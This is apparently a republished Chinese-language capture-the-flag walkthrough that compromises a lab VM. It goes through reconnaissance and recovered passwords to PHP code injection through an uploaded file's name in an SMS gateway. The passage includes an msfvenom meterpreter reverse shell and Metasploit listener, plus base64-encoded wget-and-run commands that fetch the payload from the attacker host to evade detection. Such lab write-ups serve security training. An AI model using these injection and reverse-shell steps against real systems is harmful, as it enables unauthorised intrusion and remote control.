CTF-命令注入

本文阅读 2 分钟
首页 Linux,系统 正文

kali 192.168.20.128

靶机 192.168.20.141

nmap -sV 192.168.20.141

img

nmap -A -v -T4 192.168.20.141

img

nikto -host http://192.168.20.141

img

dirb http://192.168.20.141

img

访问敏感页面

img

依次访问robots.txt下的禁止页面

在/nothing特殊的404

img

查看源码

img

访问/secure目录

下载backup.zip

img

解压文件复制到桌面

发现需要密码,利用之前/nothing网页源代码下的密码尝试

输入freedom

img

查看文件具体类型

file backup-cred.mp3

img

读取文件

cat backup-cred.mp3

img

利用网址

访问192.168.20.141/SecreTSMSgatwayLogin

img

登陆

账号是touhid

密码是/nothing页面源代码下的密码(依次尝试)尝试到diana成功登录

img

利用searchsploit进行渗透

img

查找路径

img

查看路径

cat /usr/share/exploitdb/exploits/php/webapps/42003.txt

img

翻译描述

不受限制的文件上传:

由于sendfromfile.php中的文件验证不正确,任何注册用户都可以上传任何文件

代码执行使用$filename

现在我们知道sendfromfile.php接受任何文件扩展名,只读取不存储在服务器中的内容。但是当用户上传my后门.php服务器愉快地接受,但不存储在任何文件夹,所以我们的shell是无用的。但是如果用户将文件名改为“my后门.php”改为“php系统(uname - a);?>.php" den服务器检查文件并设置一些参数$filename="php系统(uname - a);?>.php",你可以看到下面的代码,并在页面上显示$filename

访问提示页面

img

img

上传CSV文件

创建1.csv文件

img

 img

利用BP解析数据包

img

根据提示执行代码

img

将1.csv改成<?php system('uname -a'); dia();?>.php

img

img

每次查看都要重新抓包

查看id

img

img

filename存在代码执行和代码注入

启动metasploit监听

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.20.128

set lport 4444

run

img

生成shell

msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.20.128 lport=4444 -f elf > /var/www/html/shell

img

利用base64绕过防火墙检测

service apache2 start

echo 'wget http://192.168.20.128/shell -O /tmp/a' |base64

echo 'chmod 777 /tmp/a' |base64

echo '/tmp/a' |base64

img

<?php system(base64_encode('放置base64代码')); dia();?>.php

img

img

img

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125024442
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复